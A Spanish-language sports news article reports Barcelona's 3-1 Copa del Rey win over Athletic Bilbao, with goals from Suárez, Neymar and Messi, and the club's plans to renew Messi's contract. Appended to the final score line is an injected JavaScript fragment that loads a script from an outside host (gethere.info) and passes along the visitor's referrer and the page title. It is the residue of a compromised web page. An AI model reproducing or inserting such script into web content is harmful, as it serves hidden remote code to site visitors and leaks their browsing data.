Deportes

Tres goles de Suárez, Messi y Neymar mete al Barcelona en cuartos de final

Tres goles de Suárez, Messi y Neymar metieron este miércoles al Barcelona en los cuartos de final de la Copa del Rey, tras la victoria 3-1 sobre el Athletic de Bilbao en el Camp Nou.

Luis Suárez abrió el marcador al rematar de volea un pase de Neymar (35), quien haría el 2-0 al marcar un penal en el segundo tiempo (48).

Enric Saborit acortó distancias con un tanto de cabeza (51), pero un tercer tanto de falta directa de Messi (79) dio el pase a la siguiente fase al vigente defensor del título.

El temible tridente ofensivo del Barcelona, que lleva ya 302 goles desde que juegan junto hace dos temporadas y media, dio al equipo azulgrana su primera victoria en este año 2017 en un partido disputado, en el que el Barcelona empezó sufriendo hasta que a partir del gol de Suárez y especialmnente, tras el descanso, tomó las riendas el encuentro. El Real Madrid enfrentará hoy al Sevilla con la ventaja de 3-0 y la idea de concretar su clasificación oficial.

¿Y la renovación de Messi?

El FC Barcelona confía en poder renovar el contrato de su atacante argentino Lionel Messi, actualmente ligado al club hasta 2018, pero lo hará manteniendo “el sentido común” y respetando su marco presupuestario, declaró el miércoles el director general del equipo azulgrana, Oscar Grau.

“Queremos que el mejor jugador de la historia se quede en el Barça y queremos renovar a estos jugadores hechos en casa. Son los mejores y se deberían retirar en casa”, afirmó en alusión a Messi y a Andrés Iniesta.

“Se debe analizar, estamos trabajando con sentido común y discreción. Queremos que Messi se quede y encontraremos la manera, seguro. Me gustaría tranquilizar a los socios”, apuntó.

Después de las recientes renovaciones de contrato hasta 2021 del brasileño Neymar (24 años) y del uruguayo Luis Suárez (29 años), el Barcelona anunció su intención de renovar a su estrella argentina (29 años).

Barcelona FC 3

Ath. Bilbao  1s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;